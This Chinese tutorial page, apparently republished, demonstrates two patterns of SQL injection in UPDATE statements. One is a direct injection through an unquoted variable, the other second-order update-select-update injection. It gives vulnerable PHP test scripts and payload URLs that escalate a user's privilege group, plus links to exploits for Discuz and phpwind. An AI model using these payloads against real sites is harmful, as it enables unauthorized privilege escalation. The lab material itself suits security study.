update注射测试 update注射有哪些基本模式?
一.测试环境:
OS: Windowsxp sp2
php: php 4.3.10 (
mysql 4.1.9
apache 1.3.33
二.测试数据库结构:
-----start---
-- 数据库: `test`
--
-- --------------------------------------------------------
--
-- 表的结构 `userinfo`
--
CREATE TABLE `userinfo` (
`groudid` varchar(12) NOT NULL default ’1’,
`user` varchar(12) NOT NULL default ’heige’,
`pass` varchar(122) NOT NULL default ’123456’
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
--
-- 导出表中的数据 `userinfo`
--
INSERT INTO `userinfo` VALUES (’2’, ’heige’, ’123456’);
三.测试模式:
1,变量没有带’’或""[MOD1]
//test1.php Mod1
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass=$p where user=’heige’";//<--$P没有使用单引号
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
脚本里只是修改user=’heige’的pass,如果groudid表示用户的权限等级,我们的目的就是通过构造$p 来达
到修改groupid的目的:
那么我们提交:http://127.0.0.1/test1.php?p=123456,groudid=1
在mysql里查询:
mysql> select * from userinfo;
--------- ------- --------
groudid | user| pass |
--------- ------- --------
1 | heige | 123456 |
--------- ------- --------
1 row in set (0.01 sec)
用户heige的groudid又2改为1了 :)
所以我们可以得到没有’’或"" update的注射是可以成功的,这个就是我们的模式1。
2,变量带’’或""[MOD2]
//test2.php
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号
$result = mysql_db_query($dbname, $sql);
$userinfo = mysql_fetch_array($result);
echo "
SQL Query:$sql
";
?>
为了关闭’我们构造$p应该为123456’,groudid=’2 提交:
http://127.0.0.1/test2.php?p=123456’,groudid=’1 在gpc=on的情况下’变成了\’
提交的语句变成:SQL Query:update userinfo set pass=’123456\’,groudid=\’1’ where user=’heige’
mysql查询:
mysql> select * from userinfo;
--------- ------- --------------------
groudid | user| pass |
--------- ------- --------------------
2 | heige | 123456’,groudid=’1 |
--------- ------- --------------------
1 row in set (0.00 sec)
groudid并没有被修改。那么在变量被’’或""时 就完全没有被注射呢?不是 下面我们看模式2:
//test3.php Mod2
$servername = "localhost";
$dbusername = "root";
$dbpassword = "";
$dbname = "test";
mysql_connect($servername,$dbusername,$dbpassword) or die ("数据库连接失败");
$sql = "update userinfo set pass=’$p’ where user=’heige’";//<--$P使用单引号
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result);//$p的数据写入数据库
$sql= "select pass from userinfo where user=’heige’";
$result = mysql_db_query($dbname, $sql);
$userinfo=mysql_fetch_array($result);
echo $userinfo[0];//把pass查询输出给$userinfo[0]
$sql ="update userinfo set pass=’$userinfo[0]’ where user=’heige’";
$result = mysql_db_query($dbname, $sql);
mysql_fetch_array($result); //把$userinfo[0] 再次update
?>
我们测试下,提交:http://127.0.0.1/test3.php?p=123456’,groudid=’1
回mysql查询下 :
mysql> select * from userinfo;
--------- ------- --------
groudid | user| pass |
--------- ------- --------
1 | heige | 123456 |
--------- ------- --------
1 row in set (0.00 sec)
HaHa~~ 成功注射 修改groudid为1。 这个就是我们的模式2了,简单的描叙如下:
update-->select-->update
四.实际模式
模式1:Discuz 2.0/2.2 register.php 注射
漏洞分析:http://4ngel.net/article/41.htm
Discuz 2.0/2.2 register.php Remote Exploit :http://4ngel.net/project/discuz_reg.htm
模式2:phpwind 2.0.2和3.31e 权限提升漏洞
漏洞分析:
update (profile.php 注射变量为$proicon update语句里为,icon=’$userdb[icon]’)
v
select (jop.php)
v
updtate (jop.php) Exploit:http://www.huij.net/9xiao/up/phpwind-exploit.exe
wapi是什么意思?wapi和wifi有什么区别?
无线网络,就是利用无线电波作为信息传输的媒介构成的无线局域网(WLAN),与有线网络的用途十分类似,最大的不同在于传输媒介的不同,利用无线电技术取代网线,可以和有线网络互为备份。WAPI标准WAPI是WLAN Aut
详情2018-01-22 10:55:38责编:llp 来源:驱动管家无线数据加密的原理是什么?无线数据加密的方法
你肯定不会设计一个没有防火墙的互联网接入的网络。因此,你怎么会架设一个没有加密的无线网络?理解无线加密对于部署一个安全的无线网络是非常重要的。无线传输的安全类似于一个书面信息。有各种各样的方法来发
详情2018-01-02 22:38:07责编:llp 来源:驱动管家iis php存在任意代码执行漏洞,导致任意代码执行
描述:目标存在任意代码执行漏洞。漏洞形成原因:PHP默认配置有误,IS+PHP fastcgi模式在解析PHP文件时存在缺陷,导致任意文件会被服务器以PHP格式解析,从而导致任意代码执行。验证方式:打开目标页面后在原URL
详情2018-02-02 09:46:40责编:llp 来源:驱动管家虚拟主机的危机 hzhost虚拟主机有什么致命漏洞?
编者注:HZHOST虚拟主机管理系统,在国内的虚拟主机应用比较广泛,但是存了这样的一个漏洞让人觉得心惊,也让整个虚拟主机系统沦陷。千里之堤,毁于蚁穴!在此提醒各位网络管理员(站长),在做好系统的维护的同
详情2018-01-13 08:49:38责编:llp 来源:驱动管家snort输出插件的方法是什么?目的又是什么?
日志信息通常存放在文件中。默认情况下,Snort将这些信息存放在 var log snort目录下,但是也可以在启动Snort时用命令行开关来改变这个目录。日志信息可以存储为文本格式或者二进制格式,二进制格式的文件可以供S
详情2018-01-25 14:17:28责编:llp 来源:驱动管家为你讲解怎么在mac系统加密pdf文件?
我上班的时候经常使用不同的文字处理器和文本编辑软件。我写好的大部分文档都用很流行的那种(尤其是Windows用户常用的)选项来生成,也就是用“打印-〉保存成PDF”。很多情况下,有些个人的PDF文档,我需要进行加密。 很多工具,比如Adobe Acrobat都能给PDF文件设
详情2018-01-13 11:34:18责编:llp 来源:驱动管家你知道网站安全测试的工具awvs的使用方法吗?
一、打开应用1、打开应用,出现如图所示界面:二、创建一个新的测试项目这里以CSDN为例:1 点击File –> New –> Web Site Scan或者工具栏上的“New Scan”打开创建页面,如下图:2 填写需
详情2018-01-16 17:30:30责编:llp 来源:驱动管家什么是av终结者?av终结者专杀病毒的使用教程
现在电脑用户们面对的病毒不再试单个的,而是一群分工合作的病毒生产、传播、盗号工作室,而且专杀软甲也不是他们的对手,下面的教程就是针对这个问题介绍的如何处理这些病毒。AV终结者(帕虫)是反击杀毒软件,植
详情2018-01-25 10:19:04责编:llp 来源:驱动管家企业保护商业机密的方法有哪些?可以通过这两个方面实现?
现在很多企业都有自己的商业机密,或者是客户资料,或者是设计图纸,或者是源代码等。这些资料是企业重要的无形资产,直接涉及到企业的经济利益,同时也关系到企业未来的市场竞争,甚至还可能影响企业的生死存亡
详情2018-02-06 11:30:57责编:llp 来源:驱动管家验证码破解有怎么样的机制?验证码破解实例
输入表单提交网站验证,验证成功后才能使用某项功能。不少网站为了防止用户利用机器人自动注册、登录、灌水,都采用了 验证码
详情2018-01-14 16:04:52责编:llp 来源:驱动管家
- skype打电话时语音质量很差是怎么回事?
- ppt幻灯片制作好后可以在朋友圈转发吗?怎么在微信上发ppt幻灯片?
- 什么菲星数码摄像机值得购买?菲星数码摄像机介绍
- wifi网络摄像机有哪些特点?wifi网络摄像机的介绍
- 局域网共享设置的工具怎么使用?win7设置局域网共享方法
- xp系统电脑怎么运行启动项命令?
- 三星s7什么时候出?三星s7国行版何时开卖?
- 加入眼球识别技术的vivo x5pro如何设置眼球识别?
- dmg文件是怎么打开的?哪些软件可以打开dmg文件?
- dns的工作原理 dns欺骗怎么攻击服务器?
- 怎样把相册做成视频?数码大师把相册做成视频的方法
- 如何控制局域网网速?控制局域网网速的方法步骤
- 微距镜头和普通镜头之间的区别有哪些
- 插卡摄像机怎么安装?插卡摄像机操作方法介绍
- 在电脑桌面上快速创建网页的快捷方法是什么
- ssid怎么设置?win8设置网络ssid的方法
- 三星note edge续航能力如何?三星note edge充电要多久?
- 三星s4连接电脑的步骤 三星s4如何连接电脑?
- 笔记本连电视的方法是什么?怎么设置双屏显示?
- 先要用taskList备份系统进程,后用系统自带的工具绞杀病毒